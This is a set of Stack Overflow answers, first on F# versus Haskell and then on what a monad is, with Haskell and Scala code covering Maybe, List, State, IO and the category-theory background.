A: Well, for one I'd say a main advantage is that F# compiles against the .NET platform which makes it easy to deploy on windows. I've seen examples which explained using F# combined with ASP.NET to build web applications ;-)
On the other hand, Haskell has been around for waaaaay longer, so I think the group of people who are real experts on that language is a lot bigger.
For F# I've only seen one real implementation so far, which is the Singularity proof of concept OS. I've seen more real world implementations of Haskell.
A: Haskell is a "pure" functional language, where as F# has aspects of both imperative/OO and functional languages. Haskell also has lazy evaluation, which is fairly rare amongst functional languages.
What do these things mean? A pure functional language, means there are no side effects (or changes in shared state, when a function is called) which means that you are guaranteed that if you call f(x), nothing else happens besides returning a value from the function, such as console output, database output, changes to global or static variables.. and although Haskell can have non pure functions (through monads), it must be 'explicitly' implied through declaration.
Pure functional languages and 'No side effect' programming has gained popularity recently as it lends itself well to multi core concurrency, as it is much harder to get wrong with no shared state, rather than myriad locks & semaphores.
Lazy evaluation is where a function is NOT evaluated until it is absolutely necessary required. meaning that many operation can be avoided when not necessary. Think of this in a basic C# if clause such as this:
if(IsSomethingTrue() && AnotherThingTrue())
{
do something;
}
If IsSomethingTrue() is false, then the AnotherThingTrue() method is never evaluated.
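In Haskell the same idea goes much further; this works even though the source list is infinite, because only five elements are ever demanded:
firstFiveEven :: [Int]
firstFiveEven = take 5 (filter even [1 ..]) -- [2,4,6,8,10]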
While Haskell is an amazing language, the major benefit of F# (for the time being) is that it sits on top of the CLR. This lends itself to polyglot programming. One day, you may write your web UI in ASP.NET MVC, your business logic in C#, your core algorithms in F# and your unit tests in IronRuby... all within the .NET framework.
Listen to the Software Engineering radio with Simon Peyton Jones for more info on Haskell: Episode 108: Simon Peyton Jones on Functional Programming and Haskell
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44961",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "135"
} |
Q: What is a monad? Having briefly looked at Haskell recently, what would be a brief, succinct, practical explanation as to what a monad essentially is?
I have found most explanations I've come across to be fairly inaccessible and lacking in practical detail.
A: I've been thinking of Monads in a different way, lately. I've been thinking of them as abstracting out execution order in a mathematical way, which makes new kinds of polymorphism possible.
If you're using an imperative language, and you write some expressions in order, the code ALWAYS runs exactly in that order.
And in the simple case, when you use a monad, it feels the same -- you define a list of expressions that happen in order. Except that, depending on which monad you use, your code might run in order (like in IO monad), in parallel over several items at once (like in the List monad), it might halt partway through (like in the Maybe monad), it might pause partway through to be resumed later (like in a Resumption monad), it might rewind and start from the beginning (like in a Transaction monad), or it might rewind partway to try other options (like in a Logic monad).
And because monads are polymorphic, it's possible to run the same code in different monads, depending on your needs.
Plus, in some cases, it's possible to combine monads together (with monad transformers) to get multiple features at the same time.
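A small illustration of that polymorphism (a sketch, not from the original answer): the same monadic code, run in two different monads, picks up two different execution behaviours.
pairSum :: Monad m => m Int -> m Int -> m Int
pairSum mx my = do
  x <- mx
  y <- my
  return (x + y)

-- In Maybe, failure short-circuits:
--   pairSum (Just 1) (Just 2) == Just 3
--   pairSum (Just 1) Nothing  == Nothing
-- In [], every combination is tried:
--   pairSum [1, 2] [10, 20]   == [11, 21, 12, 22]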
A: tl;dr
{-# LANGUAGE InstanceSigs #-}
newtype Id t = Id t
instance Monad Id where
return :: t -> Id t
return = Id
(=<<) :: (a -> Id b) -> Id a -> Id b
f =<< (Id x) = f x
Prologue
The application operator $ of functions
forall a b. a -> b
is canonically defined
($) :: (a -> b) -> a -> b
f $ x = f x
infixr 0 $
in terms of Haskell-primitive function application f x (infixl 10).
Composition . is defined in terms of $ as
(.) :: (b -> c) -> (a -> b) -> (a -> c)
f . g = \ x -> f $ g x
infixr 9 .
and satisfies the equivalences forall f g h.
f . id = f :: c -> d Right identity
id . g = g :: b -> c Left identity
(f . g) . h = f . (g . h) :: a -> d Associativity
. is associative, and id is its right and left identity.
The Kleisli triple
In programming, a monad is a functor type constructor with an instance of the monad type class. There are several equivalent variants of definition and implementation, each carrying slightly different intuitions about the monad abstraction.
A functor is a type constructor f of kind * -> * with an instance of the functor type class.
{-# LANGUAGE KindSignatures #-}
class Functor (f :: * -> *) where
map :: (a -> b) -> (f a -> f b)
In addition to following statically enforced type protocol, instances of the functor type class must obey the algebraic functor laws forall f g.
map id = id :: f t -> f t Identity
map f . map g = map (f . g) :: f a -> f c Composition / short cut fusion
Functor computations have the type
forall f t. Functor f => f t
A computation c r consists in results r within context c.
Unary monadic functions or Kleisli arrows have the type
forall m a b. Functor m => a -> m b
Kleisli arrows are functions that take one argument a and return a monadic computation m b.
Monads are canonically defined in terms of the Kleisli triple forall m. Functor m =>
(m, return, (=<<))
implemented as the type class
class Functor m => Monad m where
return :: t -> m t
(=<<) :: (a -> m b) -> m a -> m b
infixr 1 =<<
The Kleisli identity return is a Kleisli arrow that promotes a value t into monadic context m. Extension or Kleisli application =<< applies a Kleisli arrow a -> m b to results of a computation m a.
Kleisli composition <=< is defined in terms of extension as
(<=<) :: Monad m => (b -> m c) -> (a -> m b) -> (a -> m c)
f <=< g = \ x -> f =<< g x
infixr 1 <=<
<=< composes two Kleisli arrows, applying the left arrow to results of the right arrow’s application.
Instances of the monad type class must obey the monad laws, most elegantly stated in terms of Kleisli composition: forall f g h.
f <=< return = f :: c -> m d Right identity
return <=< g = g :: b -> m c Left identity
(f <=< g) <=< h = f <=< (g <=< h) :: a -> m d Associativity
<=< is associative, and return is its right and left identity.
Identity
The identity type
type Id t = t
is the identity function on types
Id :: * -> *
Interpreted as a functor,
return :: t -> Id t
= id :: t -> t
(=<<) :: (a -> Id b) -> Id a -> Id b
= ($) :: (a -> b) -> a -> b
(<=<) :: (b -> Id c) -> (a -> Id b) -> (a -> Id c)
= (.) :: (b -> c) -> (a -> b) -> (a -> c)
In canonical Haskell, the identity monad is defined
newtype Id t = Id t
instance Functor Id where
map :: (a -> b) -> Id a -> Id b
map f (Id x) = Id (f x)
instance Monad Id where
return :: t -> Id t
return = Id
(=<<) :: (a -> Id b) -> Id a -> Id b
f =<< (Id x) = f x
Option
An option type
data Maybe t = Nothing | Just t
encodes computation Maybe t that does not necessarily yield a result t, computation that may “fail”. The option monad is defined
instance Functor Maybe where
map :: (a -> b) -> (Maybe a -> Maybe b)
map f (Just x) = Just (f x)
map _ Nothing = Nothing
instance Monad Maybe where
return :: t -> Maybe t
return = Just
(=<<) :: (a -> Maybe b) -> Maybe a -> Maybe b
f =<< (Just x) = f x
_ =<< Nothing = Nothing
a -> Maybe b is applied to a result only if Maybe a yields a result.
newtype Nat = Nat Int
The natural numbers can be encoded as those integers greater than or equal to zero.
toNat :: Int -> Maybe Nat
toNat i | i >= 0 = Just (Nat i)
| otherwise = Nothing
The natural numbers are not closed under subtraction.
(-?) :: Nat -> Nat -> Maybe Nat
(Nat n) -? (Nat m) = toNat (n - m)
infixl 6 -?
The option monad covers a basic form of exception handling.
(-? 20) <=< toNat :: Int -> Maybe Nat
List
The list monad, over the list type
data [] t = [] | t : [t]
infixr 5 :
and its additive monoid operation “append”
(++) :: [t] -> [t] -> [t]
(x : xs) ++ ys = x : xs ++ ys
[] ++ ys = ys
infixr 5 ++
encodes nonlinear computation [t] yielding a natural amount 0, 1, ... of results t.
instance Functor [] where
map :: (a -> b) -> ([a] -> [b])
map f (x : xs) = f x : map f xs
map _ [] = []
instance Monad [] where
return :: t -> [t]
return = (: [])
(=<<) :: (a -> [b]) -> [a] -> [b]
f =<< (x : xs) = f x ++ (f =<< xs)
_ =<< [] = []
Extension =<< concatenates ++ all lists [b] resulting from applications f x of a Kleisli arrow a -> [b] to elements of [a] into a single result list [b].
Let the proper divisors of a positive integer n be
divisors :: Integral t => t -> [t]
divisors n = filter (`divides` n) [2 .. n - 1]
divides :: Integral t => t -> t -> Bool
(`divides` n) = (== 0) . (n `rem`)
then
forall n. let { f = f <=< divisors } in f n = []
In defining the monad type class, instead of extension =<<, the Haskell standard uses its flip, the bind operator >>=.
class Applicative m => Monad m where
(>>=) :: forall a b. m a -> (a -> m b) -> m b
(>>) :: forall a b. m a -> m b -> m b
m >> k = m >>= \ _ -> k
{-# INLINE (>>) #-}
return :: a -> m a
return = pure
For simplicity's sake, this explanation uses the type class hierarchy
class Functor f
class Functor m => Monad m
In Haskell, the current standard hierarchy is
class Functor f
class Functor p => Applicative p
class Applicative m => Monad m
because not only is every monad a functor, but every applicative is a functor and every monad is an applicative, too.
Using the list monad, the imperative pseudocode
for a in (1, ..., 10)
for b in (1, ..., 10)
p <- a * b
if even(p)
yield p
roughly translates to the do block,
do a <- [1 .. 10]
b <- [1 .. 10]
let p = a * b
guard (even p)
return p
the equivalent monad comprehension,
[ p | a <- [1 .. 10], b <- [1 .. 10], let p = a * b, even p ]
and the expression
[1 .. 10] >>= (\ a ->
[1 .. 10] >>= (\ b ->
let p = a * b in
guard (even p) >> -- [ () | even p ] >>
return p
)
)
Do notation and monad comprehensions are syntactic sugar for nested bind expressions. The bind operator is used for local name binding of monadic results.
let x = v in e = (\ x -> e) $ v = v & (\ x -> e)
do { r <- m; c } = (\ r -> c) =<< m = m >>= (\ r -> c)
where
(&) :: a -> (a -> b) -> b
(&) = flip ($)
infixl 0 &
The guard function is defined
guard :: Additive m => Bool -> m ()
guard True = return ()
guard False = fail
where the unit type or “empty tuple”
data () = ()
Additive monads that support choice and failure can be abstracted over using a type class
class Monad m => Additive m where
fail :: m t
(<|>) :: m t -> m t -> m t
infixl 3 <|>
instance Additive Maybe where
fail = Nothing
Nothing <|> m = m
m <|> _ = m
instance Additive [] where
fail = []
(<|>) = (++)
where fail and <|> form a monoid forall k l m.
k <|> fail = k
fail <|> l = l
(k <|> l) <|> m = k <|> (l <|> m)
and fail is the absorbing/annihilating zero element of additive monads
_ =<< fail = fail
If in
guard (even p) >> return p
even p is true, then the guard produces [()], and, by the definition of >>, the local constant function
\ _ -> return p
is applied to the result (). If false, then the guard produces the list monad’s fail ( [] ), which yields no result for a Kleisli arrow to be applied >> to, so this p is skipped over.
State
Infamously, monads are used to encode stateful computation.
A state processor is a function
forall st t. st -> (t, st)
that transitions a state st and yields a result t. The state st can be anything. Nothing, flag, count, array, handle, machine, world.
The type of state processors is usually called
type State st t = st -> (t, st)
The state processor monad is the kinded * -> * functor State st. Kleisli arrows of the state processor monad are functions
forall st a b. a -> (State st) b
In canonical Haskell, the lazy version of the state processor monad is defined
newtype State st t = State { stateProc :: st -> (t, st) }
instance Functor (State st) where
map :: (a -> b) -> ((State st) a -> (State st) b)
map f (State p) = State $ \ s0 -> let (x, s1) = p s0
in (f x, s1)
instance Monad (State st) where
return :: t -> (State st) t
return x = State $ \ s -> (x, s)
(=<<) :: (a -> (State st) b) -> (State st) a -> (State st) b
f =<< (State p) = State $ \ s0 -> let (x, s1) = p s0
in stateProc (f x) s1
A state processor is run by supplying an initial state:
run :: State st t -> st -> (t, st)
run = stateProc
eval :: State st t -> st -> t
eval = fst . run
exec :: State st t -> st -> st
exec = snd . run
State access is provided by primitives get and put, methods of abstraction over stateful monads:
{-# LANGUAGE MultiParamTypeClasses, FunctionalDependencies #-}
class Monad m => Stateful m st | m -> st where
get :: m st
put :: st -> m ()
m -> st declares a functional dependency of the state type st on the monad m; that a State t, for example, will determine the state type to be t uniquely.
instance Stateful (State st) st where
get :: State st st
get = State $ \ s -> (s, s)
put :: st -> State st ()
put s = State $ \ _ -> ((), s)
with the unit type used analogously to void in C.
modify :: Stateful m st => (st -> st) -> m ()
modify f = do
s <- get
put (f s)
gets :: Stateful m st => (st -> t) -> m t
gets f = do
s <- get
return (f s)
gets is often used with record field accessors.
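For instance, with a hypothetical record type (illustration only, not from the original):
data Config = Config { verbosity :: Int, logFile :: FilePath }

getVerbosity :: State Config Int
getVerbosity = gets verbosity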
The state monad equivalent of the variable threading
let s0 = 34
s1 = (+ 1) s0
n = (* 12) s1
s2 = (+ 7) s1
in (show n, s2)
where s0 :: Int, is the equally referentially transparent, but infinitely more elegant and practical
(flip run) 34
(do
modify (+ 1)
n <- gets (* 12)
modify (+ 7)
return (show n)
)
modify (+ 1) is a computation of type State Int (), except for its effect equivalent to return ().
(flip run) 34
(modify (+ 1) >>
gets (* 12) >>= (\ n ->
modify (+ 7) >>
return (show n)
)
)
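Evaluating by hand (an illustrative aside): modify (+ 1) takes the state from 34 to 35, gets (* 12) binds n = 420 while leaving the state untouched, and modify (+ 7) takes it from 35 to 42, so the whole expression yields ("420", 42).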
The monad law of associativity can be written in terms of >>= forall m f g.
(m >>= f) >>= g = m >>= (\ x -> f x >>= g)
or
do { r1 <- do { r0 <- m; f r0 }; g r1 }
  =  do { x <- m; do { r1 <- f x; g r1 } }
  =  do { r0 <- m; r1 <- f r0; g r1 }
Like in expression-oriented programming (e.g. Rust), the last statement of a block represents its yield. The bind operator is sometimes called a “programmable semicolon”.
Iteration control structure primitives from structured imperative programming are emulated monadically
for :: Monad m => (a -> m b) -> [a] -> m ()
for f = foldr ((>>) . f) (return ())
while :: Monad m => m Bool -> m t -> m ()
while c m = do
b <- c
if b then m >> while c m
else return ()
forever :: Monad m => m a -> m b
forever m = m >> forever m
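A small usage sketch combining these with the State monad above (illustrative, not from the original):
sumTo5 :: State Int ()
sumTo5 = for (\ i -> modify (+ i)) [1 .. 5]

-- exec sumTo5 0 = 15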
Input/Output
data World
The I/O world state processor monad is a reconciliation of pure Haskell and the real world, of functional denotative and imperative operational semantics. A close analogue of the actual strict implementation:
type IO t = World -> (t, World)
Interaction is facilitated by impure primitives
getChar :: IO Char
putChar :: Char -> IO ()
readFile :: FilePath -> IO String
writeFile :: FilePath -> String -> IO ()
hSetBuffering :: Handle -> BufferMode -> IO ()
hTell :: Handle -> IO Integer
. . . . . .
The impurity of code that uses IO primitives is permanently protocolized by the type system. Because purity is awesome, what happens in IO, stays in IO.
unsafePerformIO :: IO t -> t
Or, at least, should.
The type signature of a Haskell program
main :: IO ()
main = putStrLn "Hello, World!"
expands to
World -> ((), World)
A function that transforms a world.
Epilogue
The category whose objects are Haskell types and whose morphisms are functions between Haskell types is, “fast and loose”, the category Hask.
A functor T is a mapping from a category C to a category D; for each object in C an object in D
Tobj : Obj(C) -> Obj(D)
f :: * -> *
and for each morphism in C a morphism in D
Tmor : HomC(X, Y) -> HomD(Tobj(X), Tobj(Y))
map :: (a -> b) -> (f a -> f b)
where X, Y are objects in C. HomC(X, Y) is the homomorphism class of all morphisms X -> Y in C. The functor must preserve morphism identity and composition, the “structure” of C, in D.
Tmor(id)          = id          : Tobj(X) -> Tobj(X)   Identity
Tmor(f) . Tmor(g) = Tmor(f . g) : Tobj(X) -> Tobj(Z)   Composition
The Kleisli category of a category C is given by a Kleisli triple
<T, eta, _*>
of an endofunctor
T : C -> C
(in Haskell, the type constructor f :: * -> *), an identity morphism eta (return), and an extension operator _* (=<<).
Each Kleisli morphism in Hask
f : X -> T(Y)
f :: a -> m b
by the extension operator
(_)* : Hom(X, T(Y)) -> Hom(T(X), T(Y))
(=<<) :: (a -> m b) -> (m a -> m b)
is given a morphism in Hask’s Kleisli category
f* : T(X) -> T(Y)
(f =<<) :: m a -> m b
Composition in the Kleisli category .T is given in terms of extension
f .T g = f* . g : X -> T(Z)
f <=< g = (f =<<) . g :: a -> m c
and satisfies the category axioms
eta .T g = g : Y -> T(Z) Left identity
return <=< g = g :: b -> m c
f .T eta = f : Z -> T(U) Right identity
f <=< return = f :: c -> m d
(f .T g) .T h = f .T (g .T h) : X -> T(U) Associativity
(f <=< g) <=< h = f <=< (g <=< h) :: a -> m d
which, applying the equivalence transformations
eta .T g = g
eta* . g = g By definition of .T
eta* . g = id . g forall f. id . f = f
eta* = id forall f g h. f . h = g . h ==> f = g
(f .T g) .T h = f .T (g .T h)
(f* . g)* . h = f* . (g* . h) By definition of .T
(f* . g)* . h = f* . g* . h . is associative
(f* . g)* = f* . g* forall f g h. f . h = g . h ==> f = g
in terms of extension are canonically given
eta* = id : T(X) -> T(X) Left identity
(return =<<) = id :: m t -> m t
f* . eta = f : Z -> T(U) Right identity
(f =<<) . return = f :: c -> m d
(f* . g)* = f* . g* : T(X) -> T(Z) Associativity
(((f =<<) . g) =<<) = (f =<<) . (g =<<) :: m a -> m c
Monads can also be defined in terms not of Kleislian extension, but a natural transformation mu, in programming called join. A monad is defined in terms of mu as a triple over a category C, of an endofunctor
T : C -> C
f :: * -> *
and two natural transformations
eta : Id -> T
return :: t -> f t
mu : T . T -> T
join :: f (f t) -> f t
satisfying the equivalences
mu . T(mu) = mu . mu : T . T . T -> T . T Associativity
join . map join = join . join :: f (f (f t)) -> f t
mu . T(eta) = mu . eta = id : T -> T Identity
join . map return = join . return = id :: f t -> f t
The monad type class is then defined
class Functor m => Monad m where
return :: t -> m t
join :: m (m t) -> m t
The canonical mu implementation of the option monad:
instance Monad Maybe where
return = Just
join (Just m) = m
join Nothing = Nothing
The concat function
concat :: [[a]] -> [a]
concat (x : xs) = x ++ concat xs
concat [] = []
is the join of the list monad.
instance Monad [] where
return :: t -> [t]
return = (: [])
(=<<) :: (a -> [b]) -> ([a] -> [b])
(f =<<) = concat . map f
Implementations of join can be translated from extension form using the equivalence
mu = id* : T . T -> T
join = (id =<<) :: m (m t) -> m t
The reverse translation from mu to extension form is given by
f* = mu . T(f) : T(X) -> T(Y)
(f =<<) = join . map f :: m a -> m b
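A quick sanity check with the option monad, using the canonical join above and the option functor's map:
f =<< Just x  = join (map f (Just x)) = join (Just (f x)) = f x
f =<< Nothing = join (map f Nothing)  = join Nothing      = Nothing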
*
*Philip Wadler: Monads for functional programming
*Simon L Peyton Jones, Philip Wadler: Imperative functional programming
*Jonathan M. D. Hill, Keith Clarke: An introduction to category theory, category theory monads, and their relationship to functional programming
*Kleisli category
*Eugenio Moggi: Notions of computation and monads
*What a monad is not
But why should a theory so abstract be of any use for programming?
The answer is simple: as computer scientists, we value abstraction! When we design the interface to a software component, we want it to reveal as little as possible about the implementation. We want to be able to replace the implementation with many alternatives, many other ‘instances’ of the same ‘concept’. When we design a generic interface to many program libraries, it is even more important that the interface we choose have a variety of implementations. It is the generality of the monad concept which we value so highly, it is because category theory is so abstract that its concepts are so useful for programming.
It is hardly suprising, then, that the generalisation of monads that we present below also has a close connection to category theory. But we stress that our purpose is very practical: it is not to ‘implement category theory’, it is to find a more general way to structure combinator libraries. It is simply our good fortune that mathematicians have already done much of the work for us!
from Generalising Monads to Arrows by John Hughes
A: A monad is a datatype that has two operations: >>= (aka bind) and return (aka unit). return takes an arbitrary value and creates an instance of the monad with it. >>= takes an instance of the monad and maps a function over it. (You can see already that a monad is a strange kind of datatype, since in most programming languages you couldn't write a function that takes an arbitrary value and creates a type from it. Monads use a kind of parametric polymorphism.)
In Haskell notation, the monad interface is written
class Monad m where
return :: a -> m a
(>>=) :: forall a b . m a -> (a -> m b) -> m b
These operations are supposed to obey certain "laws", but that's not terrifically important: the "laws" just codify the way sensible implementations of the operations ought to behave (basically, that >>= and return ought to agree about how values get transformed into monad instances and that >>= is associative).
Monads are not just about state and I/O: they abstract a common pattern of computation that includes working with state, I/O, exceptions, and non-determinism. Probably the simplest monads to understand are lists and option types:
instance Monad [ ] where
[] >>= k = []
(x:xs) >>= k = k x ++ (xs >>= k)
return x = [x]
instance Monad Maybe where
Just x >>= k = k x
Nothing >>= k = Nothing
return x = Just x
where [] and : are the list constructors, ++ is the concatenation operator, and Just and Nothing are the Maybe constructors. Both of these monads encapsulate common and useful patterns of computation on their respective data types (note that neither has anything to do with side effects or I/O).
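For a quick taste of the Maybe monad in action, a small usage sketch (safeDiv is a hypothetical helper, not a library function):
safeDiv :: Int -> Int -> Maybe Int
safeDiv _ 0 = Nothing
safeDiv n d = Just (n `div` d)

-- Just 10 >>= safeDiv 100               ==> Just 10
-- Just 0  >>= safeDiv 100 >>= safeDiv 6 ==> Nothing (the chain short-circuits)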
You really have to play around writing some non-trivial Haskell code to appreciate what monads are about and why they are useful.
A: You should first understand what a functor is. Before that, understand higher-order functions.
A higher-order function is simply a function that takes a function as an argument.
A functor is any type construction T for which there exists a higher-order function, call it map, that transforms a function of type a -> b (given any two types a and b) into a function T a -> T b. This map function must also obey the laws of identity and composition such that the following expressions return true for all p and q (Haskell notation):
map id = id
map (p . q) = map p . map q
For example, a type constructor called List is a functor if it comes equipped with a function of type (a -> b) -> List a -> List b which obeys the laws above. The only practical implementation is obvious. The resulting List a -> List b function iterates over the given list, calling the (a -> b) function for each element, and returns the list of the results.
A monad is essentially just a functor T with two extra methods, join, of type T (T a) -> T a, and unit (sometimes called return, fork, or pure) of type a -> T a. For lists in Haskell:
join :: [[a]] -> [a]
pure :: a -> [a]
Why is that useful? Because you could, for example, map over a list with a function that returns a list. Join takes the resulting list of lists and concatenates them. List is a monad because this is possible.
You can write a function that does map, then join. This function is called bind, or flatMap, or (>>=), or (=<<). This is normally how a monad instance is given in Haskell.
A monad has to satisfy certain laws, namely that join must be associative. This means that if you have a value x of type [[[a]]] then join (join x) should equal join (map join x). And pure must be an identity for join such that join (pure x) == x.
A: Monads Are Not Metaphors, but a practically useful abstraction emerging from a common pattern, as Daniel Spiewak explains.
A: Explaining "what is a monad" is a bit like saying "what is a number?" We use numbers all the time. But imagine you met someone who didn't know anything about numbers. How the heck would you explain what numbers are? And how would you even begin to describe why that might be useful?
What is a monad? The short answer: It's a specific way of chaining operations together.
In essence, you're writing execution steps and linking them together with the "bind function". (In Haskell, it's named >>=.) You can write the calls to the bind operator yourself, or you can use syntax sugar which makes the compiler insert those function calls for you. But either way, each step is separated by a call to this bind function.
So the bind function is like a semicolon; it separates the steps in a process. The bind function's job is to take the output from the previous step, and feed it into the next step.
That doesn't sound too hard, right? But there is more than one kind of monad. Why? How?
Well, the bind function can just take the result from one step, and feed it to the next step. But if that's "all" the monad does... that actually isn't very useful. And that's important to understand: Every useful monad does something else in addition to just being a monad. Every useful monad has a "special power", which makes it unique.
(A monad that does nothing special is called the "identity monad". Rather like the identity function, this sounds like an utterly pointless thing, yet turns out not to be... But that's another story™.)
Basically, each monad has its own implementation of the bind function. And you can write a bind function such that it does hoopy things between execution steps. For example:
*
*If each step returns a success/failure indicator, you can have bind execute the next step only if the previous one succeeded. In this way, a failing step aborts the whole sequence "automatically", without any conditional testing from you. (The Failure Monad.)
*Extending this idea, you can implement "exceptions". (The Error Monad or Exception Monad.) Because you're defining them yourself rather than it being a language feature, you can define how they work. (E.g., maybe you want to ignore the first two exceptions and only abort when a third exception is thrown.)
*You can make each step return multiple results, and have the bind function loop over them, feeding each one into the next step for you. In this way, you don't have to keep writing loops all over the place when dealing with multiple results. The bind function "automatically" does all that for you. (The List Monad.)
*As well as passing a "result" from one step to another, you can have the bind function pass extra data around as well. This data now doesn't show up in your source code, but you can still access it from anywhere, without having to manually pass it to every function. (The Reader Monad.)
*You can make it so that the "extra data" can be replaced. This allows you to simulate destructive updates, without actually doing destructive updates. (The State Monad and its cousin the Writer Monad.)
*Because you're only simulating destructive updates, you can trivially do things that would be impossible with real destructive updates. For example, you can undo the last update, or revert to an older version.
*You can make a monad where calculations can be paused, so you can pause your program, go in and tinker with internal state data, and then resume it.
*You can implement "continuations" as a monad. This allows you to break people's minds!
All of this and more is possible with monads. Of course, all of this is also perfectly possible without monads too. It's just drastically easier using monads.
A: In addition to the excellent answers above, let me offer you a link to the following article (by Patrick Thomson) which explains monads by relating the concept to the JavaScript library jQuery (and its way of using "method chaining" to manipulate the DOM):
jQuery is a Monad
The jQuery documentation itself doesn't refer to the term "monad" but talks about the "builder pattern" which is probably more familiar. This doesn't change the fact that you have a proper monad there maybe without even realizing it.
A: A monad is a way of combining computations together that share a common context. It is like building a network of pipes. When constructing the network, there is no data flowing through it. But when I have finished piecing all the bits together with 'bind' and 'return' then I invoke something like runMyMonad monad data and the data flows through the pipes.
A: In practice, monad is a custom implementation of function composition operator that takes care of side effects and incompatible input and return values (for chaining).
A: [Disclaimer: I am still trying to fully grok monads. The following is just what I have understood so far. If it’s wrong, hopefully someone knowledgeable will call me on the carpet.]
Arnar wrote:
Monads are simply a way of wrapping things and providing methods to do operations on the wrapped stuff without unwrapping it.
That’s precisely it. The idea goes like this:
*
*You take some kind of value and wrap it with some additional information. Just like the value is of a certain kind (eg. an integer or a string), so the additional information is of a certain kind.
E.g., that extra information might be a Maybe or an IO.
*Then you have some operators that allow you to operate on the wrapped data while carrying along that additional information. These operators use the additional information to decide how to change the behaviour of the operation on the wrapped value.
E.g., a Maybe Int can be a Just Int or Nothing. Now, if you add a Maybe Int to a Maybe Int, the operator will check to see if they are both Just Ints inside, and if so, will unwrap the Ints, pass them to the addition operator, re-wrap the resulting Int into a new Just Int (which is a valid Maybe Int), and thus return a Maybe Int. But if one of them was a Nothing inside, this operator will just immediately return Nothing, which again is a valid Maybe Int. That way, you can pretend that your Maybe Ints are just normal numbers and perform regular math on them. If you were to get a Nothing, your equations will still produce the right result – without you having to litter checks for Nothing everywhere.
But the example is just what happens for Maybe. If the extra information was an IO, then that special operator defined for IOs would be called instead, and it could do something totally different before performing the addition. (OK, adding two IO Ints together is probably nonsensical – I’m not sure yet.) (Also, if you paid attention to the Maybe example, you have noticed that “wrapping a value with extra stuff” is not always correct. But it’s hard to be exact, correct and precise without being inscrutable.)
Basically, “monad” roughly means “pattern”. But instead of a book full of informally explained and specifically named Patterns, you now have a language construct – syntax and all – that allows you to declare new patterns as things in your program. (The imprecision here is all the patterns have to follow a particular form, so a monad is not quite as generic as a pattern. But I think that’s the closest term that most people know and understand.)
And that is why people find monads so confusing: because they are such a generic concept. To ask what makes something a monad is similarly vague as to ask what makes something a pattern.
But think of the implications of having syntactic support in the language for the idea of a pattern: instead of having to read the Gang of Four book and memorise the construction of a particular pattern, you just write code that implements this pattern in an agnostic, generic way once and then you are done! You can then reuse this pattern, like Visitor or Strategy or Façade or whatever, just by decorating the operations in your code with it, without having to re-implement it over and over!
So that is why people who understand monads find them so useful: it’s not some ivory tower concept that intellectual snobs pride themselves on understanding (OK, that too of course, teehee), but actually makes code simpler.
A: The two things that helped me best when learning about there were:
Chapter 8, "Functional Parsers," from Graham Hutton's book Programming in Haskell. This doesn't mention monads at all, actually, but if you can work through chapter and really understand everything in it, particularly how a sequence of bind operations is evaluated, you'll understand the internals of monads. Expect this to take several tries.
The tutorial All About Monads. This gives several good examples of their use, and I have to say that the analogy in Appendex I worked for me.
A: Monoid appears to be something that ensures that all operations defined on a Monoid and a supported type will always return a supported type inside the Monoid. Eg, Any number + Any number = A number, no errors.
Whereas division accepts two fractionals, and returns a fractional, which defined division by zero as Infinity in haskell somewhy(which happens to be a fractional somewhy)...
In any case, it appears Monads are just a way to ensure that your chain of operations behaves in a predictable way, and a function that claims to be Num -> Num, composed with another function of Num->Num called with x does not say, fire the missiles.
On the other hand, if we have a function which does fire the missiles, we can compose it with other functions which also fire the missiles, because our intent is clear -- we want to fire the missiles -- but it won't try printing "Hello World" for some odd reason.
In Haskell, main is of type IO (), or IO [()]; the distinction is strange and I will not discuss it, but here's what I think happens:
If I have main, I want it to do a chain of actions; the reason I run the program is to produce an effect -- usually through IO. Thus I can chain IO operations together in main in order to do IO, nothing else.
If I try to do something which does not "return IO", the program will complain that the chain does not flow, or basically "How does this relate to what we are trying to do -- an IO action", it appears to force the programmer to keep their train of thought, without straying off and thinking about firing the missiles, while creating algorithms for sorting -- which does not flow.
Basically, Monads appear to be a tip to the compiler that "hey, you know this function that returns a number here, it doesn't actually always work, it can sometimes produce a Number, and sometimes Nothing at all, just keep this in mind". Knowing this, if you try to assert a monadic action, the monadic action may act as a compile time exception saying "hey, this isn't actually a number, this CAN be a number, but you can't assume this, do something to ensure that the flow is acceptable." which prevents unpredictable program behavior -- to a fair extent.
It appears monads are not about purity, nor control, but about maintaining an identity of a category on which all behavior is predictable and defined, or does not compile. You cannot do nothing when you are expected to do something, and you cannot do something if you are expected to do nothing (visible).
The biggest reason I could think of for Monads is -- go look at Procedural/OOP code, and you will notice that you do not know where the program starts, nor ends, all you see is a lot of jumping and a lot of math, magic, and missiles. You will not be able to maintain it, and if you can, you will spend quite a lot of time wrapping your mind around the whole program before you can understand any part of it, because modularity in this context is based on interdependent "sections" of code, where code is optimized to be as related as possible for promise of efficiency/inter-relation. Monads are very concrete, and well defined by definition, and ensure that the flow of the program is possible to analyze, and isolate parts which are hard to analyze -- as they themselves are monads. A monad appears to be a "comprehensible unit which is predictable upon its full understanding" -- if you understand the "Maybe" monad, there's no possible way it will do anything except be "Maybe", which appears trivial, but in most non-monadic code, a simple function "helloworld" can fire the missiles, do nothing, or destroy the universe or even distort time -- we have no idea nor have any guarantees that IT IS WHAT IT IS. A monad GUARANTEES that IT IS WHAT IT IS, which is very powerful.
All things in the "real world" appear to be monads, in the sense that they are bound by definite observable laws preventing confusion. This does not mean we have to mimic all the operations of this object to create classes; instead we can simply say "a square is a square", nothing but a square, not even a rectangle nor a circle, and "a square has an area of the length of one of its sides multiplied by itself". No matter what square you have, if it's a square in 2D space, its area absolutely cannot be anything but its length squared; it's almost trivial to prove. This is very powerful because we do not need to make assertions to ensure that our world is the way it is, we just use implications of reality to prevent our programs from falling off track.
I'm pretty much guaranteed to be wrong, but I think this could help somebody out there, so hopefully it does.
A: In the context of Scala you will find the following to be the simplest definition. Basically flatMap (or bind) is 'associative' and there exists an identity.
trait M[+A] {
def flatMap[B](f: A => M[B]): M[B] // AKA bind
// Pseudo Meta Code
def isValidMonad: Boolean = {
// for every parameter the following holds
def isAssociativeOn[X, Y, Z](x: M[X], f: X => M[Y], g: Y => M[Z]): Boolean =
x.flatMap(f).flatMap(g) == x.flatMap(f(_).flatMap(g))
// for every parameter X and x, there exists an id
// such that the following holds
def isAnIdentity[X](x: M[X], id: X => M[X]): Boolean =
x.flatMap(id) == x
}
}
E.g.
// These could be any functions
val f: Int => Option[String] = number => if (number == 7) Some("hello") else None
val g: String => Option[Double] = string => Some(3.14)
